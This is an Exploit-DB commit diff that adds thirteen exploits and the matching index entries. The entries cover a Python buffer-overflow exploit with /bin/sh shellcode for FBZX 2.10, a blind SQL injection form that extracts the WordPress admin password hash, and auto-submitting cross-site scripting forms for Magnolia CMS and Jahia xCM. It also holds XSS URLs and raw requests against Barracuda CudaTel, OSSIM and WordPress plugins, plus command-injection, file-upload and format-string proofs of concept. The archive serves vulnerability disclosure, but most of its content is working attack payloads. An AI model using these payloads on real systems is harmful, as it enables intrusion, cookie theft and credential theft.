DB: 2015-11-12

13 new exploits

files.csv

@@ -34941,3 +34941,16 @@ id,file,description,date,author,platform,type,port
 38667,platforms/windows/remote/38667.py,"ReadyMedia Remote Heap Buffer Overflow Vulnerability",2013-07-15,"Zachary Cutlip",windows,remote,0
 38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption Information Disclosure Vulnerability",2013-07-09,"Brad Antoniewicz",windows,local,0
 38669,platforms/multiple/remote/38669.txt,"MongoDB 'conn' Mongo Object Remote Code Execution Vulnerability",2013-06-04,"SCRT Security",multiple,remote,0
+38671,platforms/hardware/remote/38671.txt,"Barracuda CudaTel Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",hardware,remote,0
+38672,platforms/windows/local/38672.txt,"YardRadius Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0
+38673,platforms/php/webapps/38673.txt,"Collabtive Multiple Security Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps,0
+38674,platforms/php/webapps/38674.txt,"WordPress FlagEm Plugin 'cID' Parameter Cross Site Scripting Vulnerability",2013-07-22,"IeDb ir",php,webapps,0
+38675,platforms/php/webapps/38675.html,"Magnolia CMS Multiple Cross Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps,0
+38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin Cross Site Scripting Vulnerability",2013-07-24,"High-Tech Bridge",php,webapps,0
+38677,platforms/php/webapps/38677.txt,"VBulletin <= 4.0.2 'update_order' Parameter SQL Injection Vulnerability",2013-07-24,n3tw0rk,php,webapps,0
+38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0
+38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0
+38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0
+38681,platforms/linux/local/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,local,0
+38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
+38683,platforms/php/webapps/38683.txt,"Jahia xCM /administration/ Multiple Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0

platforms/hardware/remote/38663.txt

@@ -1,7 +1,6 @@
-# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on
-Adsl Modems
+# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems
 # Date: 10.11.2015
-# Exploit Author: Murat Sahin
+# Exploit Author: Murat Sahin  (@murtshn)
 # Vendor Homepage: Huawei
 # Version: HG630a and HG630a-50
 # Tested on: linux,windows

platforms/hardware/remote/38671.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/61353/info
+
+Barracuda CudaTel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Barracuda CudaTel 2.6.02.04 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/gui/route/route?%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C
+http://www.example.com/gui/route/route?_=1354073910062&bbx_outbound_route_flag_locked=%3C[CLIENT-SIDE SCRIPT
+CODE!]%20%3C
+http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C#
+http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C# 

platforms/linux/local/38681.py

@@ -0,0 +1,48 @@
+# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
+# Program: fbzx - ZX Spectrum Emulator for X
+# Tested on: GNU/Linux - Kali Linux 2.0 x86
+#
+# Description: FBZX v2.10 and prior is prone to a stack-based buffer overflow
+# vulnerability because the application fails to perform adequate
+# boundary-checks on user-supplied input.
+#
+# An attacker could exploit this issue to execute arbitrary code in the
+# context of the application. Failed exploit attempts will result in a
+# denial-of-service condition.
+#
+# Vendor homepage: *http://www.rastersoft.com/ <http://www.rastersoft.com/>*
+# Kali Linux 2.0 package: http://repo.kali.org/kali/pool/contrib/f/fbzx/
+# MD5: 0fc1d2e9c374c1156b2b02186a9f8980
+
+import os,subprocess
+def run():
+  try:
+    print "# FBZX v2.10 Stack-Based Overflow by Juan Sacco"
+    print "# It's Fuzzing time on unusable exploits"
+    print "# This exploit is for educational purposes only"
+    # Basic structure: JUNK + SHELLCODE + NOPS + EIP
+
+    junk = "\x41"*8
+    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+    nops = "\x90"*5010
+    eip = "\x10\xd3\xff\xbf"
+    subprocess.call(["fbzx",'  ', junk + shellcode + nops + eip])
+
+  except OSError as e:
+    if e.errno == os.errno.ENOENT:
+        print "FBZX not found!"
+    else:
+        print "Error executing exploit"
+    raise
+
+def howtousage():
+  print "Sorry, something went wrong"
+  sys.exit(-1)
+
+if __name__ == '__main__':
+  try:
+    print "Exploit FBZX 2.10 Local Overflow Exploit"
+    print "Author: Juan Sacco"
+  except IndexError:
+    howtousage()
+run()

platforms/linux/remote/38680.html

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/61491/info
+
+XMonad.Hooks.DynamicLog module for xmonad is prone to multiple remote command-injection vulnerabilities.
+
+Successful exploits will result in the execution of arbitrary commands in the context of the affected applications. This may aid in further attacks. 
+
+<html>
+<head>
+<title><action=xclock>An innocent title</action></title>
+</head>
+<body>
+<h1>Good bye, cruel world</h1>
+</body>
+</html>
+

platforms/php/webapps/38673.txt

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/61384/info
+
+Collabtive is prone to multiple cross-site scripting vulnerabilities, an arbitrary file upload vulnerability, and a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to bypass certain security restrictions, upload and execute arbitrary script code in the context of the affected web server process. This may let attackers steal cookie-based authentication credentials, perform unauthorized actions, or compromise the application; other attacks are possible.
+
+Collabtive 1.0 is vulnerable; other versions may also be affected. 
+
+File upload:
+
+https://www.example.com/secprj/files/standard/avatar/uploadedshell_104185.php
+
+Cross-site scripting:
+
+https://www.example.com/secprj/managechat.php?userto=<SCRIPT/XSS SRC="http://www.example1.com/xss.js";></SCRIPT>&uid=2
+
+"><SCRIPT/XSS SRC="http://www.example1.com/xss.js";></SCRIPT>
+
+Security-bypass:
+
+https://www.example.com/secprj/manageuser.php?action=del&id=5 

platforms/php/webapps/38674.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/61401/info
+
+The FlagEm plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/wp-content/plugins/FlagEm/flagit.php?cID=[Xss] 

platforms/php/webapps/38675.html

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/61423/info
+
+Magnolia CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Magnolia CMS versions 4.5.7, 4.5.8, 4.5.9, 5.0 and 5.0.1 are vulnerable.
+
+<form action="http://www.example.com/magnoliaPublic/demo-project/members-area/registration.html" method="post" name="main">
+<input type="hidden" name="mgnlModelExecutionUUID" value="8417fe0e-8f61-4d21-bdf1-c9c23b13ba14">
+<input type="hidden" name="password" value='password'>
+<input type="hidden" name="passwordConfirmation" value='password'>
+<input type="hidden" name="username" value='"><script>alert(document.cookie);</script>'>
+<input type="hidden" name="fullName" value='"><script>alert(document.cookie);</script>'>
+<input type="hidden" name="email" value='"><script>alert(document.cookie);</script>'>
+<input type="submit" id="btn">
+</form>
+<script>
+document.main.submit();
+</script>
+
+

platforms/php/webapps/38676.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/61425/info
+
+The Duplicator plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Duplicator 0.4.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 

platforms/php/webapps/38677.txt

@@ -0,0 +1,53 @@
+source: http://www.securityfocus.com/bid/61449/info
+
+VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+VBulletin 4.0.x are vulnerable. 
+
+The exploit is caused due to a variable named 'update_order' not being
+sanitized before being used within an insert into statement.
+
+if ($_REQUEST['do'] == 'update_order')
+{
+$vbulletin->input->clean_array_gpc('r', array(
+'force_read_order'   => TYPE_ARRAY
+));
+
+if ($vbulletin->GPC['force_read_order'])
+{
+foreach ($vbulletin->GPC['force_read_order'] AS $threadid => $order)
+{
+$db->query_write("
+UPDATE " . TABLE_PREFIX . "thread AS thread
+SET force_read_order = '$order'
+WHERE threadid = '$threadid'
+");
+}
+}
+  POC
+ You will need Admincp Access then go to
+site.com/admincp/force_read_thread.php then in the force read order colum
+put a ' into one of them to show this
+ Database error in vBulletin 4.2.1:
+
+Invalid SQL:
+
+UPDATE thread AS thread
+SET force_read_order = '1''
+WHERE threadid = '5161';
+
+MySQL Error   : You have an error in your SQL syntax; check the manual that
+corresponds to your MySQL server version for the right syntax to use near
+'5161'' at line 2
+Error Number  : 1064
+Request Date  : Thursday, July 25th 2013 @ 01:20:52 AM
+Error Date    : Thursday, July 25th 2013 @ 01:20:52 AM
+Script        :
+http://www.example.com/admincp/force_read_thread.php?do=update_order
+Referrer      : http://www.example.com/admincp/force_read_thread.php
+IP Address    :
+Username      : n3tw0rk
+Classname     :
+MySQL Version :

platforms/php/webapps/38678.txt

@@ -0,0 +1,44 @@
+# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection
+# Date: 11-11-2015
+# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: webapps
+ 
+1. Description
+   
+For this vulnerabilities also WP-Polls needs to be installed.
+
+Everyone can access wpfc_wppolls_ajax_request().
+
+$_POST["poll_id"] is not escaped properly.
+
+File: wp-fastest-cache\inc\wp-polls.php
+
+public function wpfc_wppolls_ajax_request() {
+	$id = strip_tags($_POST["poll_id"]);
+	$id = mysql_real_escape_string($id);
+
+	$result = check_voted($id);
+
+	if($result){
+		echo "true";
+	}else{
+		echo "false";
+	}
+	die();
+}
+
+http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html
+
+2. Proof of Concept
+
+<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request">
+	<input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- ">
+	<input type="submit" value="Send">
+</form>
+
+3. Solution:
+   
+Update to version 0.8.4.9

platforms/php/webapps/38679.txt

@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/61456/info
+
+Open Source SIEM (OSSIM) is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Open Source SIEM (OSSIM) 4.2.3 is vulnerable; other versions may also be affected.
+
+https://
+<IP>/ossim/vulnmeter/index.php?withoutmenu=%22%3E%3Cimg%20src%3da%20onerror%3dalert%28%27XSS%27%29%3E
+https://
+<IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu="><img%20src%3da%20onerror%3dalert('XSS')>
+https://
+<IP>/ossim/av_inventory/task_edit.php?section="><img%20src%3da%20onerror%3dalert('XSS')>
+https://
+<IP>/ossim/nfsen/rrdgraph.php?cmd=get-detailsgraph&profile=<img%20src%3da%20onerror%3dalert('XSS')>
+
+POST /ossim/vulnmeter/simulate.php HTTP/1.1
+Host: <IP>
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0)
+Gecko/20100101 Firefox/21.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: https://
+<IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1
+Content-Length: 72
+Cookie: JXID=blahblah; JXHID=false; PHPSESSID=blahblah
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+hosts_alive=1&scan_locally=1&not_resolve=0&scan_server=<img%20src%3da%20onerror%3dalert('XSS')>&targets=blah
+
+
+POST /ossim/vulnmeter/simulate.php HTTP/1.1
+Host: <IP>
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0)
+Gecko/20100101 Firefox/21.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: https://
+<IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1
+Content-Length: 72
+Cookie: JXID=blahblah; JXHID=false; PHPSESSID=blahblah
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+hosts_alive=1&scan_locally=1&not_resolve=0&scan_server=Null&targets=blah<img%20src%3da%20onerror%3dalert('XSS')>
+
+

platforms/php/webapps/38682.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/61571/info
+
+Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E

platforms/php/webapps/38683.txt

@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/61571/info
+ 
+Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+ 
+An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ 
+Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected. 
+
+<form action="http://www.example.com/administration/?do=users&sub=search" method="post" name="main">
+<input type="hidden" name="searchString" value="'><script>alert(document.cookie);</script>">
+<input type="submit" id="btn">
+</form>
+<script>
+document.main.submit();
+</script>
+
+
+<form action="http://www.example.com/administration/?do=users&sub=processCreate" method="post" name="main">
+<input type="hidden" name="username" value="'><script>alert(document.cookie);</script>">
+<input type="hidden" name="manage-user-property#j:firstName" value="'><script>alert(document.cookie);</script>">
+<input type="hidden" name="manage-user-property#j:lastName" value="'><script>alert(document.cookie);</script>">
+<input type="hidden" name="manage-user-property#j:email" value="'><script>alert(document.cookie);</script>">
+<input type="hidden" name="manage-user-property#j:organization" value="'><script>alert(document.cookie);</script>">
+<input type="hidden" name="actionType" value='save'>
+<input type="submit" id="btn">
+</form>
+<script>
+document.main.submit();
+</script>

platforms/windows/local/38672.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/61356/info
+
+YardRadius is prone to multiple local format-string vulnerabilities.
+
+Local attackers can leverage these issues to cause denial-of-service conditions. Due to nature of these issues, arbitrary code-execution within the context of the vulnerable application may also be possible.
+
+YardRadius 1.1.2-4 is vulnerable; other versions may also be possible.
+
+The following proof-of-concept is available:
+
+ln -s radiusd %x
+
+./%x -v